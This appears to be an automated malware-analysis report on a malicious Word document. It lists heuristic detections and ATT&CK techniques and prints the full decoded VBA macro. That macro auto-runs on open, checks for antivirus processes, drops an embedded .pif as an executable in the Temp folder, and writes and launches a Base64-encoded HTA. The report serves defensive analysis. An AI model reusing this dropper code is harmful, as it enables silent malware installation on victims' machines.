MALICIOUS
838
Risk Score
Malware Insights
MITRE ATT&CK
T1203 Exploitation for Client Execution
T1059.005 Visual Basic
T1059.001 PowerShell
T1140 Deobfuscate/Decode Files or Information
The sample exploits CVE-2007-3899, a memory corruption vulnerability in Microsoft Word, to execute a VBA macro. This macro utilizes WScript.Shell and WMI to launch a second-stage executable, embedded_office_00016e66.exe. The macro also contains a Base64-decoded command stager that executes 'cmd.exe /c ping localhost -n 100 &&', indicating an attempt to download and execute further payloads.
Heuristics 20
-
CVE-2007-3899 — Microsoft Word malformed string memory corruption critical CVE likely CVE_2007_3899Word OLE document has the MS07-060 malformed-string exploit shape: a Word 97-family FIB points to a malformed DOP/string-table region with an abnormal INT_MAX run, inflated text counters, and exploit payload or Mdropper.Z campaign evidence.
-
Office EPRINT stream contains EMF object high OLE_EPRINT_EMF_OBJECTOLE ObjectPool contains an EPRINT stream with EMF data. This is rare in normal documents and is related Office object-delivery evidence when paired with exploit payload anomalies, but the malformed graphics record required for exact CVE attribution is not proven by this rule alone.
-
ClamAV: Doc.Malware.Valyria-6698324-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Valyria-6698324-0
-
XOR-encoded strings (key 0xD2) critical SC_XOR_ENCODEDFound 3 Windows library/API name(s) XOR-encoded with single-byte key 0xD2: 'LoadLibraryA', 'GetProcAddress', 'VirtualAlloc'
Disassembly
x86 disassembly · validity: code (0.823) — no internal branches to corroborate control flow0002026C 9e sahf 0002026D bdb3b69ebb mov ebp, 0xbb9eb6b3 00020272 b0a0 mov al, 0xa0 00020274 b3a0 mov bl, 0xa0 00020276 ab stosd dword ptr es:[edi], eax 00020277 93 xchg ebx, eax 00020278 d25112 rcl byte ptr [ecx + 0x12], cl 0002027B d15b57 rcr dword ptr [ebx + 0x57], 1 0002027E ca2d2d retf 0x2d2d 00020281 2d8a5957ca sub eax, 0xca57598a 00020286 2d2d2d8259 sub eax, 0x59822d2d 0002028B 9f lahf 0002028C 22832d870a5b and al, byte ptr [ebx + 0x5b0a872d] 00020292 57 push edi 00020293 e62d out 0x2d, al 00020295 2d2d823ad2 sub eax, 0xd23a822d 0002029A d2d2 rcl dl, cl 0002029C d28a39df84bb ror byte ptr [edx - 0x447b20c7], cl 000202A2 a0a6a7b3be mov al, byte ptr [0xbeb3a7a6] 000202A7 93 xchg ebx, eax 000202A8 bebebdb1d2 mov esi, 0xd2b1bdbe 000202AD 51 push ecx 000202AE 12d1 adc dl, cl 000202B0 5b pop ebx 000202B1 57 push edi 000202B2 ea2d2d2d8a5947 ljmp 0x4759:0x8a2d2d2d 000202B9 ea2d2d2d805997 ljmp 0x9759:0x802d2d2d 000202C0 22822d870a5b and al, byte ptr [edx + 0x5b0a872d] 000202C6 97 xchg edi, eax 000202C7 6a82 push -0x7e 000202C9 3ad2 cmp dl, dl 000202CB d2 .byte 0xd2
-
Embedded PE executable critical OLE_EMBEDDED_EXEMZ/PE header found inside document — possible embedded executable
-
Ole10Native package drops an auto-executable payload critical OFFICE_PACKAGE_RISKY_FILEOLE Package displayName or fullPath ends in a directly auto-executable extension (a runnable binary or a script the default shell host runs on double-click). Embedding such a payload inside an Office document has no benign authoring use — it is a malware-delivery dropper.
-
VBA macros detected medium 9 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Shell StrConv(DecodeBase64("Y21kLmV4ZSAvYyAgcGluZyBsb2NhbGhvc3QgLW4gMTAwICYmIA=="), vbUnicode) & Environ(StrConv(DecodeBase64("VGVtcA=="), vbUnicode)) & "\6.e" & "x" & "e", vbHide -
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
Set wsh = VBA.CreateObject("WScript.Shell") -
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATEVBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.Matched line in script
Set gDvcvsd = GetObject("wi" & "nmgmts:") -
VBA Base64-decoded Shell command stager critical OLE_VBA_BASE64_SHELL_COMMAND_STAGERVBA auto-exec macro decodes Base64 string literals into command or script-launch text and executes the result with Shell. This catches cmd/cscript/PowerShell/VBS launchers hidden from plain keyword matching.Matched line in script
Set gDvcvsd = GetObject("wi" & "nmgmts:") -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set wsh = VBA.CreateObject("WScript.Shell") -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Set gDvcvsd = GetObject("wi" & "nmgmts:") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_Open() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
Open Environ("Temp") & "\1.hta" For Output As #1 -
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Reference to VirtualProtect API medium SC_STR_VIRTUALPROTECTReference to VirtualProtect API
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/officeDocument/2006/bibliography In document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 4
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5641 bytes |
SHA-256: 5d918920ca6728791af74c42e77df828322a06bb8bb1737ec56702928c6760fa |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 2 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error Resume Next
Call kfs
Call sdfsdf
Set d = New DataObject
d.SetText " "
d.PutInClipboard
Selection.MoveUp Unit:=wdScreen, Count:=7
Selection.MoveUp Unit:=wdScreen, Count:=7
Selection.MoveLeft Unit:=wdCharacter, Count:=13
Dim t As Date
t = Now
Do
DoEvents
Loop Until Now >= DateAdd("s", 3, t)
Call Module1.killo
End Sub
Private Sub Document_Close()
Call closee
End Sub
Private Function DecodeBase64(ByVal strData As String) As Byte()
Dim objXML As MSXML2.DOMDocument
Dim objNode As MSXML2.IXMLDOMElement
Set objXML = New MSXML2.DOMDocument
Set objNode = objXML.createElement("b64")
objNode.dataType = "bin.base64"
objNode.Text = strData
DecodeBase64 = objNode.nodeTypedValue
Set objNode = Nothing
Set objXML = Nothing
End Function
Attribute VB_Name = "Module1"
Sub killo()
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatXMLDocument
Application.Quit
End Sub
Attribute VB_Name = "Module2"
Sub closee()
Dim Hdfgdwd, gDvcvsd
Dim fdfdgsd
Set gDvcvsd = GetObject("wi" & "nmgmts:")
Dim gfdfsfsfs
Set Hdfgdwd = gDvcvsd.ExecQuery("SELECT * FROM Win32_Process")
Dim hdffsdfs
For Each x In Hdfgdwd
Set wsh = VBA.CreateObject("WScript.Shell")
Dim pipec As Boolean: pipec = True
If x.Name = "bdagent.exe" Then
Dim kk
kk = StrConv(DecodeBase64("IFdJT" & "kRPV1N" & "UQVRFPSJub3JtYWwiPg0KICAgIDxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0IiBsYW5ndWFnZT0iamF2YXNjcmlwdCI+DQogICAgDQogICAgICAgIFdzaFNoZWxsID0gbmV3IEFjdGl2ZVhPYmplY3QoIldTY3JpcHQuU2hlbGwiKTsNCiAgICAgICAgV3NoU2hlbGwuUnVuKCI2LmV4ZSIsIDEsIGZhbHNlKTsNCiAgICAgICAgDQogICAgPC9zY3JpcHQ+DQogPFNDUklQVCBMQU5HVUFHRT0iVkJTY3JpcHQiPg0KICAgICAgICAgIFdpbmRvdy5DbG9zZQ0KICAgICA8L1NDUklQVD4NCjwvaGVhZD4NCjxib2R5Pg0KICAgDQo8L2JvZHk+DQo8L2h0bWw+DQo="), vbUnicode)
Open Environ("Temp") & "\1.hta" For Output As #1
Print #1, StrConv(DecodeBase64("PGh0bWw+DQo8aGVhZD4NCiA8U0NSSVBUIExBTkdVQUdFPSJWQlNjcmlwdCI+DQogICAgICAgICAgV2luZG93Lk1vdmVUbyAtMzIwMDAsIC0zMjAwMA0KICAgICA8L1NDUklQVD4NCiAgICA8dGl0bGU+QXBwbGljYXRpb24gRXhlY3V0ZXI8L3RpdGxlPg0KICAgIDxIVEE6QVBQTElDQVRJT04gSUQ9Im9NeUFwcCIgDQogICAgICAgIEFQUExJQ0FUSU9OTkFNRT0iQXBwbGljYXRpb24gRXhlY3V0ZXIiIA0KICAgICAgICBCT1JERVI9Im5vIg0KICAgICAgICBDQVBUSU9OPSJubyINCiAgICAgICAgU0hPV0lOVEFTS0JBUj0ieWVzIg0KICAgICAgICBTSU5HTEVJTlNUQU5DRT0ieWVzIg0KICAgICAgICBTWVNNRU5VPSJ5ZXMiDQogICAgICAgIFNDUk9MTD0ibm8i"), vbUnicode)
Print #1, kk
Close #1
ChDir Environ("Temp")
wsh.Run Environ("Temp") & "\1.hta", 0, False
Exit Sub
End If
If x.Name = "PSUAMain.exe" Then
Shell StrConv(DecodeBase64("Y21kLmV4ZSAvYyAgcGluZyBsb2NhbGhvc3QgLW4gMTAwICYmIA=="), vbUnicode) & Environ(StrConv(DecodeBase64("VGVtcA=="), vbUnicode)) & "\6.e" & "x" & "e", vbHide
Exit Sub
End If
Next
Shell StrConv(DecodeBase64("Y21kLmV4ZSAvYyAgcGluZyBsb2NhbGhvc3QgLW4gMTAwICYmIA=="), vbUnicode) & Environ(StrConv(DecodeBase64("VGVtcA=="), vbUnicode)) & StrConv(DecodeBase64("XDYucGlm"), vbUnicode), vbHide
End Sub
Private Function DecodeBase64(ByVal strData As String) As Byte()
Dim objXML As MSXML2.DOMDocument
Dim objNode As MSXML2.IXMLDOMElement
Set objXML = New MSXML2.DOMDocument
Set objNode = objXML.createElement("b64")
objNode.dataType = "bin.base64"
objNode.Text = strData
DecodeBase64 = objNode.nodeTypedValue
Set objNode = Nothing
Set objXML = Nothing
End Function
Attribute VB_Name = "Module3"
Sub kfs()
Selection.MoveDown Unit:=wdScreen, Count:=7
Selection.MoveDown Unit:=wdScreen, Count:=7
Selection.MoveRight Unit:=wdCharacter, Count:=24
Selection.TypeBackspace
Selection.Copy
End Sub
Attribute VB_Name = "Module4"
Sub sdfsdf()
Dim kk, lll
lll = "e" & "xe"
kk = ".p" & "if"
ChDir Environ("Temp")
Selection.TypeBackspace
Dim FSO As Object
Set FSO = CreateObject("scripting.filesystemobject")
FSO.copyfile Source:="5C" & kk, Destination:="6." & lll
FSO.copyfile Source:="5C" & kk, Destination:="6" & UserForm1.TextBox1.Text
End Sub
Private Function DecodeBase64(ByVal strData As String) As Byte()
Dim objXML As MSXML2.DOMDocument
Dim objNode As MSXML2.IXMLDOMElement
Set objXML = New MSXML2.DOMDocument
Set objNode = objXML.createElement("b64")
objNode.dataType = "bin.base64"
objNode.Text = strData
DecodeBase64 = objNode.nodeTypedValue
Set objNode = Nothing
Set objXML = Nothing
End Function
Attribute VB_Name = "UserForm3"
Attribute VB_Base = "0{7BD97CFF-E6A6-411C-901C-6DFCC38C80A6}{DBC2429A-F48B-41A6-97FF-83968A45408A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{E296C0D9-B460-4B9A-BE4F-EF37BBB80D0B}{FE155B10-F35F-4245-A78C-ABC85D7D2F90}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
|
|||
embedded_office_00016e66.exe |
embedded-pe | Office MZ+PE at offset 0x16E66 | 118682 bytes |
SHA-256: b7121de4b320ec80a7d030a454c4bffe44360475f2ebbab5da24ddeba954f041 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Static shellcode analysis recovered command string(s): WScript.Shell Carved macro source contains an auto-exec entry point and execution/download terms.
|
|||
ole10native_00.bin |
ole-package | OLE Ole10Native stream: ObjectPool/_1597663758/Ole10Native | 72980 bytes |
SHA-256: d2d95478d8941fa826533aee7ac66a26be7b2d03ed3cb80a5c76e3e7f8e5c7f1 |
|||
ole10native_00_5C.pif |
ole-package-payload | OLE Ole10Native payload: ObjectPool/_1597663758/Ole10Native; display_name=5C.pif; full_path=C:\Users\win7home\AppData\Local\Temp\5C.pif; temp_path=; def_file= | 72704 bytes |
SHA-256: 5b4918e5c17099b65c96b2fc6765143f20c06e7bc38b168b4892b4a3237a8b26 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.